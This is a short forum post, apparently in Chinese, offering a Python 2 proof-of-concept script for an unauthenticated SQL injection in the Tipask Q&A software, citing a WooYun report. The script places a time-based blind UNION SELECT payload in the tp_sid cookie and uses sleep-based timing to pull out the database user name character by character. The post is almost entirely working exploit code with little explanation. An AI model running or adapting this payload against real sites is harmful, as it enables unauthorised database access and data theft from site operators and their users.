tipask前台无条件sql注入(验证脚本)
漏洞来源:http://www.wooyun.org/bugs/wooyun-2010-0136776import urllib2
import time
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
name = ""
for i in range(1,21):
for p in payloads:
s1 = "%s" %(i)
s2 = "%s" %(ord(p))
s = "http://192.168.1.100/tipask/"
start_time = time.time()
try:
opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', "tp_lastrefresh=0; tp_sid=40c3e295006a9634' UNION SELECT null,null,null,null,null,if(ORD(mid((select user()),"+s1+",1))="+s2+",sleep(3),0)#; "))
req = urllib2.Request(s)
req_data=opener.open(req,timeout=150)
if time.time() - start_time > 3.0:
name = name+p
print name+'.....'
except urllib2.URLError,e:
break
print 'user is %s'% name
页:
[1]